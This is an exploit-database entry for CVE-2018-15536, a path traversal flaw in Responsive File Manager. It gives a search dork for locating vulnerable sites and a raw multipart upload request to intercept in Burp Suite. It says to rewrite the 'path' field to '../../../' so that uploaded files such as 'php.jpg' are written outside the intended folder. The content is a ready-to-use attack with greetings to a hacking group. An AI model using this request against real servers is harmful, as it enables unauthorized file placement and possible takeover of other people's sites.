Responsive File Manager with Path Traversal

2019.10.26
id L4663r666h05t (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2018-15536
CWE: CWE-22
Dork: inurl:/filemanager/ "dialog.php"


CVSS Base Score: 5.8/10
Impact Subscore: 4.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: Partial

Exploit Title: Responsive File Manager with Path Traversal Author: L4663r666h05t x Indonesian Code Party Vendor Homepage: https://www.responsivefilemanager.com/ Dork: inurl:/filemanager/ "dialog.php" Reference Links: https://www.exploit-db.com/exploits/45271 https://www.owasp.org/index.php/Path_Traversal You need burpsuite in this case. Request: ------------------------------------------------- ------WebKitFormBoundary00YRAbg8d9xdbAiC Content-Disposition: form-data; name="path" ../source/ ------WebKitFormBoundary00YRAbg8d9xdbAiC Content-Disposition: form-data; name="path_thumb" ../thumbs/ ------WebKitFormBoundary00YRAbg8d9xdbAiC Content-Disposition: form-data; name="file"; filename="hworld.txt" Content-Type: text/plain - hello world ! - ------WebKitFormBoundary00YRAbg8d9xdbAiC-- ------------------------------------------------- Upload file in dialog.php (txt, html, php.jpg, php.fla, or php.accdb ) Start the burpsuite change "../source/" into "../../../" or "../../" or "../" (the number that the directory is replaced with ../) ------------------------------------------------- Greetz: Exploiter ID - Indonesian Code Party - L@T

References:

https://www.exploit-db.com/exploits/45271
https://www.owasp.org/index.php/Path_Traversal


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top